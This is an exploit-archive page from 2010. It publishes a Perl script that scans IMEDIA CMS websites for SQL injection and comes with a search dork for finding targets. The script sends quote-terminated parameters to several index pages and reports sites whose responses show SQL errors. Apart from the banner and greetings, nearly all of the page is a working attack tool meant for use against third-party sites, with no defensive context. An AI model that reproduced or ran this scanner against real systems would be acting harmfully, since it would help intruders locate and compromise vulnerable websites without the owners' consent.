IMEDIA (index.php) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IMEDIA (index.php) SQL Injection Vulnerability
# Published : 2010-05-20
# Author : Kannibal615
# Previous Title : Renista CMS BUG
# Next Title : DB[CMS] (article.php) SQL Injection Vulnerability

# Exploit Titre: IMEDIA (index.php) SQL Injection Vulnerability
# Date: 19-05-2010
# Auteur: Kannibal615
# Link Software: N/A
# Version: N/A
# Testé sur: ALL
# CVE: N/A
# Code: 

# DORK : Powered by: Con-Imedia


#!usr/bin/perl -w

use HTTP::Request;
use LWP::UserAgent;

system ("cls");
print "n";
print "  @@    @@  @@@@@@     @@    @@    @@@@    @@@@@@@  @@  @@   @@@@@@@  @@@@@n";
print "  @@    @@  @@   @@    @@    @@   @@  @@   @@       @@ @@    @@       @@   @@n";
print "  @@    @@  @@ @@@     @@@@@@@@  @@    @@  @@       @@@@     @@@@@@   @@   @@n";
print "   @@  @@   @@ @@@     @@@@@@@@  @@@@@@@@  @@       @@ @@    @@@@@@   @@ @@n";
print "    @@@@    @@   @@    @@    @@  @@    @@  @@       @@  @@   @@       @@   @@n";
print "     @@     @@@@@@     @@    @@  @@    @@  @@@@@@@  @@   @@  @@@@@@@  @@    @@nn";
print "                  LA ILAH ILLA ALLAH MOUHAMED RASOUL ALLAHnn";
print "nn";
print "[*]Coded By: Kannibal615 > Tunisian Genius Security > zn[at]live[dot]denn";
print "[*]Greetz 1: My Best Friend AYMEN > THE P!RATORn";
print '[*]Greetz 2: Pc-InseCt/alghaking/emptyzero/V!Ru$_T4ckJ3n';
print "n[*]Greetz 3: To All VBHACKER.NET Membersn";
print "[*]Dork    : Powered by: Con-Imedian";
print "[*]Usage   : k615>[target here]n";
print "[*]Exemple : k615> www.target.comn";
print "n";
print "k615>";

$input=<>;
chomp $input;

if ( $input !~ /^http:/ ) {
$input = 'http://' . $input;
}
if ( $input !~ //$/ ) {
$input = $input . '/';
}


@path=('index1.php?linkid=999.9"','index1.php?sublinkid=999.9"','index1.php?linkid=&sublink=999.9"',
'index2.php?linkid=999.9"','index3.php?day=999.9"');

foreach $ways(@path){

$final=$input.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /sql/ ||
$response->content =~ /SQL error/ ||
$response->content =~ /SQL/ ||
$response->content =~ /syntax/ ||
$response->content =~ /Invalid query/ ||
$response->content =~ /your SQL/ ||
$response->content =~ /MySQL/ ||
$response->content =~ /at line 1/ ||
$response->content =~ /MySQL server/ ||
$response->content =~ /version for/ ||
$response->content =~ /Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near/ ||
$response->content =~ /fetch/
){
print "[+] Vulnerable -> $finaln";
}
else{
print "[-] Not Vulner <- $finaln";
}
}
print "nnSOBHAN ALLAHn";
print "press enter to exit";
$enter=<>;




#db-exploit 19-05-2010
#Coded By Kannibal615
#Tunisian Genius Security